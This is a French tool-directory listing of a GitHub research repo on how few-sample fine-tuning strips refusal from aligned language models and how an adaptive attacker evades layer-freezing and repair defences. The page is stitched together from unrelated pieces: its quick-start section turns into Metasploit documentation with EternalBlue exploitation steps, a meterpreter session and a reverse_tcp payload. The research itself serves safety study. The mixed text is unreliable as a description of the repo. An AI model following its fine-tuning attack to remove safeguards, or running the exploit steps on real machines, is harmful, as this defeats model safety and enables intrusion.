Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/js-lee-ai/refusal-relocates
Outils DéfensifsAnalyse des VulnérabilitésApprentissage AutomatiqueArticles et RechercheSécurité de l'IAAttaque Adversariale
GitHubjs-lee-ai/refusal-relocates

refusal-relocates

Le refus se localise, le dommage se déplace, les couches de sécurité sous un fine-tuning à quelques échantillons

Voir le dépôt
5il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Refusal Relocates, refusal localizes, the damage relocates, safety layers under few-sample fine-tuning

Code MIT Paper CC BY 4.0 Python 3.10+ CI Stars

Démarrage rapide · Utilisation · CLI · Résultats · Reproduire · FAQ · Citation


Actualités

  • [2026-09-28] Code publié, avec les enregistrements d'exécution et les scripts qui reconstruisent les tableaux de l'article.

Vue d'ensemble

Quelques dizaines d'exemples nuisibles peuvent supprimer le refus d'un modèle aligné face à des requêtes nuisibles. Des travaux antérieurs localisent la sécurité à des couches et directions spécifiques, ce qui suggère de protéger l'endroit qui a été trouvé. Ce dépôt teste cette prémisse comme le ferait un attaquant adaptatif. Il trouve où le refus peut être récupéré, gèle cette région et attaque à nouveau, puis il répare la mise à jour des poids et laisse ensuite l'attaquant la propager.

L'étude repose sur trois mesures.

  • Le refus se rétablit à une profondeur. Le patchage en verrouillage transmet l'état caché complet du modèle propre à une couche au modèle compromis, au préremplissage et à chaque étape de décodage, et le refus réapparaît à une profondeur de transition reproductible.
  • Geler cette profondeur déplace les dégâts. Dans la comparaison appariée sur Llama-3.1-8B, geler les couches 0–17 déplace la transition de la couche 15 vers les couches 27 et 28, et le refus après l'attaque restreinte est de 0,00 à 0,01 contre 0,92 à 0,96 pour le modèle propre.
  • La réparation des deux premières directions cède face à une mise à jour répartie. Retirer les deux principales directions singulières de la mise à jour restaure le refus après de courts ajustements fins portant uniquement sur l'attention sur quatre points de contrôle. Un attaquant qui répartit la mise à jour réduit la réparation relative des deux premières directions à 0,000, et un détecteur calibré sur 75 ajustements fins bénins ne signale que 3 des 14 échecs de réparation.

Ce dépôt constitue la mesure et les deux défenses sous forme de petite bibliothèque, ainsi que les enregistrements d'exécution et les scripts qui reconstruisent les tableaux de l'article.

Ce qu'il fait en une image

Left, the clean and compromised models run on shared tokens and the clean hidden state is patched into the compromised model at one layer. Right, the attack is repeated with layers 0 to 17 frozen and patching is run again on the restricted checkpoint

(a) Le patchage d'activation en verrouillage écrase la sortie de couche du modèle compromis par l'état propre au préremplissage et à chaque étape de décodage. (b) Dans l'attaque appariée sur Llama, geler les couches 0–17 décale la transition à mi-plafond de 15 à 27–28.

Démarrage rapide```bash

pip install "git+https://github.com/js-lee-AI/refusal-relocates.git"

| **Commande** | **Description** |
|--------------|-----------------|
| `list` | Liste tous les modules disponibles |
| `search <keyword>` | Recherche des modules par mot-clé |
| `use <module>` | Sélectionne un module pour l'utiliser |
| `info` | Affiche des informations détaillées sur le module sélectionné |
| `options` | Affiche les options configurables du module sélectionné |
| `set <option> <value>` | Définit une option pour le module sélectionné |
| `run` / `exploit` | Exécute le module sélectionné |
| `back` | Désélectionne le module en cours |
| `sessions` | Liste les sessions actives |
| `interact <id>` | Interagit avec une session active |
| `jobs` | Liste les jobs en arrière-plan |
| `kill <id>` | Termine un job ou une session |
| `resource <file>` | Exécute un script de ressources |
| `reload` | Recharge tous les modules |
| `banner` | Affiche la bannière de l'outil |
| `clear` | Efface l'écran du terminal |
| `history` | Affiche l'historique des commandes |
| `help` | Affiche le menu d'aide |
| `exit` / `quit` | Quitte la console |

### Exemples d'utilisation

#### Scanner un réseau

msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000 PORTS => 1-1000 msf6 auxiliary(scanner/portscan/tcp) > run


#### Exploiter une cible

msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10 RHOSTS => 192.168.1.10 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit


#### Gérer les sessions

msf6 > sessions -l

Sessions actives

Id Nom Type Information Connexion


1 meterpreter x64/windows WIN-7\Administrator @ WIN-7 192.168.1.5:4444 -> 192.168.1.10:49158

msf6 > sessions -i 1 [*] Démarrage de l'interaction avec 1... meterpreter >


### Modules courants

| **Module** | **Description** |
|------------|-----------------|
| `auxiliary/scanner/portscan/tcp` | Scanner TCP |
| `auxiliary/scanner/smb/smb_version` | Détection de version SMB |
| `exploit/windows/smb/ms17_010_eternalblue` | Exploit EternalBlue (MS17-010) |
| `exploit/multi/handler` | Gestionnaire de payload générique |
| `post/multi/gather/env` | Collecte des variables d'environnement |
| `payload/windows/x64/meterpreter/reverse_tcp` | Payload Meterpreter Windows x64 |

### Bonnes pratiques

- Toujours obtenir une autorisation écrite avant de tester un système.
- Utiliser un environnement isolé (lab, VM) pour les tests.
- Documenter chaque étape de l'évaluation.
- Ne jamais laisser une session ouverte sans surveillance.
- Mettre à jour régulièrement le framework et ses modules.

### Ressources

- [Documentation officielle](https://docs.metasploit.com/)
- [Dépôt GitHub](https://github.com/rapid7/metasploit-framework)
- [Blog Rapid7](https://www.rapid7.com/blog/)
- [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)

### Licence

Ce projet est distribué sous licence BSD-3-Clause. Consultez le fichier [LICENSE](https://github.com/js-lee-ai/refusal-relocates/blob/main/LICENSE) pour plus d'informations.```python
import numpy as np
import refusal
Télécharger l’outil